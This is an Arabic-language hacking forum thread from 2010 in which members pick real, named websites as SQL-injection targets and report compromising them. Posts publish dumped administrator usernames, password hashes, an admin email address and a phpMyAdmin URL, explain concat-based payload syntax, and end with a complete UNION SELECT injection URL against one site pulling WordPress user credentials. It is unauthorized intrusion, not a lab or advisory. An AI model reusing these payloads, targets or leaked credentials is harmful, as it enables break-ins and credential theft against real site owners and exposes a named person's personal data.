:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/t33334.html)

Master vbspiders 08-05-2010 11:17 PM

[align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311
هذا اعتقد راح يكون ممل شوي لذلك راح اضيف هدف ثاني معاه للي ما قدر يحقن الاول يحقن الثاني
الهدف الثاني : http://www.vfs.com/news.php?id=7&news_id=362
بالتوفيق
تحياتي


[/align]

darkman.dz 08-05-2010 11:19 PM

عبد الله ر
يعطيك الصحة أخي العزيز
جاري تقييمك على العمل اللذي تقوم به

darkman.dz 08-05-2010 11:20 PM

Master vbspiders
جاري بعد العودة في الليل بإذن الله

TIKTAKram 08-06-2010 12:17 AM

[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

m0h@med 08-06-2010 02:15 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 187851)
d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:

concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:

concat_ws(0x3a,id,user,parola)
وشكرا مقدما

السلام عليكم أخي darkman
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا
exemple
concat(id,0x3a,passs)
resultat
admin:admin
mais si vous ajoutez 0x3a3a
concat(id,0x3a3a,passs)
resultat
admin::admin

بخصوص الاستعلام
concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية
c'est t-a dire
concat_ws(0x3a,id,user,parola)
هي نفسها
concat(id,0x3a,user,0x3a,parola)

الى الأمام دائما....^_^

Master vbspiders 08-06-2010 03:58 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 187927)
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]


[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن...
+
بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة
تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة
تحياتي

[/align]

CODE3 08-06-2010 04:11 PM

هذا أجمل شئ سمعته هذا اليوم.

darkman.dz 08-06-2010 05:16 PM

m0h@med شكرا أخي m0h@med على التوضيح
و الله أفدتني بخصوص concat_ws كثيرا
وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a

darkman.dz 08-06-2010 05:19 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 187927)
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

هل حقنت الموقع الأول ب havij أخي system-32

darkman.dz 08-06-2010 05:21 PM

الهدف الجديد


كود:

www.imagesfestival.com

darkman.dz 08-06-2010 05:30 PM

تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
smilies12
:a04:





TIKTAKram 08-06-2010 05:56 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 188441)
الهدف الجديد


كود:

www.imagesfestival.com


أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟

لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى

إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه

ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL

لكن لما نكون حقناه نعطيه الحل و يستفيد

darkman.dz 08-06-2010 06:22 PM

حقنتو يا غالي Syst3m-32
ويدويا

عبد الله ر 08-06-2010 07:10 PM

اقتباس:

تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
http://www.vbspiders.com/vb/images/s...20%2823%29.gif
:a04:

مشكور اخي العزيز ooooo_darkman_ooooo
ولو هذا واجبنا
بالنسبة للموقع : www.imagesfestival.com
والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه
بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول
مشكور على التقييم

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور

TIKTAKram 08-06-2010 07:17 PM

يا دارك لوول ليش ما قلت لي أنه WordPress ؟؟؟

جعلتني أظهر كأنني لم أستطع حقن الموقع لوول

تم الحقن بنجاح بعد معرفة السكربت WordPress لوول

إسم الجدول : wp_users

إسم عمود اليوزر : user_login

إسم عمود الباسوارد : user_pass

يوزر الأدمن : admin

باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1

بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress

و هذه الحقنة كاملة :

كود:

http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users--
بالنسبة للوحة التحكم لو تتذكر يا دارك يا مشاكس كم حكينا عنها لوول تظهر لك أني نسيت الموقع ؟؟ هههه

بالتوفيق


الساعة الآن 12:58 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0